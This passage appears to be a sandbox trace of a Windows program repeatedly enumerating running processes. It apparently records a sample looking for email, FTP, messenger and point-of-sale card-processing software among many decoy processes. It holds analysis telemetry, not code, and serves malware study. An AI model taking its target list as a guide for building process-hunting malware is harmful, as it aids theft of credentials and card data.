th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0270.923] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0270.925] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0270.927] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0270.929] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0270.930] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0270.932] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0270.965] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0270.967] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0270.969] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0270.971] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0270.972] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0270.974] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0270.976] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0270.977] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0270.979] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0271.000] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0271.002] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0271.004] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0271.006] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0271.007] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0271.009] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0271.010] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0271.012] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0271.014] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0271.015] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0271.017] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0271.019] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0271.020] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0271.022] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0271.023] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0271.025] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0271.026] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0271.076] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0271.078] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0271.079] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0271.081] CloseHandle (hObject=0x758) returned 1 [0271.081] Sleep (dwMilliseconds=0x64) [0271.185] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0271.196] Process32First (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.197] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0271.199] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0271.202] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0271.204] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0271.206] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0271.208] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0271.210] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0271.212] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0271.213] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.216] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.218] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0271.220] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.221] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.223] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.225] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.227] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.229] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.253] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.256] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0271.257] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0271.259] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0271.261] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.266] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0271.268] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0271.269] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0271.271] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0271.272] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.274] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0271.275] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0271.281] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0271.282] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0271.284] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0271.286] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0271.288] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0271.289] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0271.291] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0271.292] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0271.425] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0271.427] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0271.429] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0271.431] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0271.432] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0271.436] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0271.438] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0271.439] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0271.440] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0271.442] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, 